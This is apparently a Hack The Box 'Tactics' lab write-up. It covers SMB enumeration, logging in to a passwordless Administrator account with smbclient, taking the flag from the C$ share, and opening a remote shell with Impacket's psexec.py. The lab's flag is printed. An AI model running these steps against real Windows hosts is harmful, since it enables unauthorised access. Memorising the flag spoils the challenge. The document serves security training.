# Tactics

{% file src="<https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2Fx1zrrlBusSWYURL1tGNZ%2FTactics_Write_Up.pdf?alt=media&token=5ff134bc-7f07-4e18-a3a2-45298d6ed658>" %}

**Task 1: Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall?**

* The `-Pn` flag will treat all hosts as online and not ping the Target IP Address.

**Task 2: What does the 3-letter acronym SMB stand for?**

* Server Message Block

**Task 3: What port does SMB use to operate at?**

* 445

**Task 4: What command line argument do you give to `smbclient` to list available shares?**

* Input the command `smbclient` into the terminal to see the list of options and flags:

<figure><img src="https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FllbI7M59ACPIc2uagnD7%2Fimage.png?alt=media&#x26;token=017037c9-d8c0-4c55-839b-7d815dcf4b27" alt=""><figcaption></figcaption></figure>

* `-L` will list out the shares.

**Task 5: What character at the end of a share name indicates it's an administrative share?**

* Start by logging into the IP with `smbclient`:

```
smbclient -L [Target IP] -U Administrator
```

* Try logging into the Administrator account first, as it is the highest-privileged account on Windows.
* When prompted for a password, just hit Enter, as the account has no password set.
<figure><img src="https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2FcFZbEEwzmTJ7TodRJlB5%2Fimage.png?alt=media&#x26;token=6186ac6a-6beb-444e-9147-9d1557e9ab77" alt=""><figcaption></figcaption></figure>

* This will display the shares available.
* At the end of each share name is a "$" symbol, which marks it as an administrative share.
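As an added example (not from the original write-up), here is a small Python parser for the share table that `smbclient -L` prints, flagging administrative shares by the trailing `$` described in Task 5. The sample output it parses is constructed to mirror the smbclient table layout, and the function names `parse_share_list` and `administrative_shares` are my own.

```python
import re
from dataclasses import dataclass


@dataclass
class Share:
    name: str
    kind: str
    comment: str

    @property
    def administrative(self) -> bool:
        # Windows marks hidden/administrative shares with a trailing "$".
        return self.name.endswith("$")


def parse_share_list(output: str) -> list[Share]:
    """Extract the Sharename/Type/Comment table from `smbclient -L` output."""
    shares: list[Share] = []
    in_table = False
    for line in output.splitlines():
        stripped = line.strip()
        if not in_table:
            in_table = stripped.startswith("Sharename")
            continue
        # Table rows are tab-indented; a blank or unindented line ends the table.
        if not stripped or not line[0].isspace():
            break
        if stripped.startswith("---"):
            continue
        # Columns are separated by runs of spaces; the comment may be empty.
        parts = re.split(r"\s{2,}", stripped, maxsplit=2)
        parts += [""] * (3 - len(parts))
        shares.append(Share(*parts))
    return shares


def administrative_shares(output: str) -> list[str]:
    return [s.name for s in parse_share_list(output) if s.administrative]


# Constructed sample modelled on the smbclient -L table layout (not real output).
SAMPLE_OUTPUT = (
    "\tSharename       Type      Comment\n"
    "\t---------       ----      -------\n"
    "\tADMIN$          Disk      Remote Admin\n"
    "\tC$              Disk      Default share\n"
    "\tIPC$            IPC       Remote IPC\n"
    "\tShared          Disk      \n"
    "Reconnecting with SMB1 for workgroup listing.\n"
)
```

Feeding it real output (for example, `smbclient -L [Target IP] -U Administrator -N`, where `-N` skips the password prompt) gives the same split between administrative and user shares.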

**Task 6: Which Administrative share is accessible on the box that allows users to view the whole file system?**

* Generally speaking, the C drive contains all of the system files in a Windows OS, so the `C$` share exposes the whole file system.

**Task 7: What command can we use to download the files we find on the SMB Share?**

* Start by accessing some of the shares. You can do this with the following commands:

```
smbclient \\\\[Target IP]\\[Share Name] -U Administrator
```

* You will be prompted for a password depending on the account. In this case, the Administrator account is passwordless, so you can just hit Enter.
* You can then type `help` to see what commands are available.
* ![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2F17P5UgJ8bwxVcDwYfjok%2Fimage.png?alt=media\&token=179ef88a-ae61-4c02-a307-f9a92d679f14)
* In this case, the answer is `get`, similar to Linux.

**Task 8: Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?**

* Googling this, you can discover that `psexec.py` is a Python tool in the Impacket collection that allows you to gain a fully interactive shell on a Windows system.

**Capture the Flag:**

* Connect to the `C$` share, which exposes the common directories on the system, using the same command as above.
* Once in the `C$` share, navigate to the `C$\Users\Administrator\Desktop\` directory to find the flag.
* f751c19eda8f61ce81827e6930a1f40c

**Alternate Means to the Flag with IMPACKET:**

* Start by downloading Impacket to your host machine.

```
git clone https://github.com/SecureAuthCorp/impacket.git
```

* `cd` into the impacket directory:

```
cd impacket
```

* Set up Impacket:

```
sudo python3 setup.py install
```

* Check to make sure you have all of the requirements installed:

```
pip3 install -r requirements.txt
```

* Check out the options for psexec.py with the following:

```
psexec.py -h
```

![](https://4124809220-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlcxVqdgOGpkobti7mzML%2Fuploads%2Fy0fsYI7ORrn9p46aeH4T%2Fimage.png?alt=media\&token=55c52083-4926-48a3-b22a-f4cb6e727106)

* `psexec.py` is located in the `/impacket/example/` directory.
* Next, use the tool to gain an interactive shell on the Windows target:

```
python3 psexec.py username:password@[Target IP]
```

* Since the Administrator account is passwordless, we will just use the following:

```
python3 psexec.py administrator@[Target IP]
```
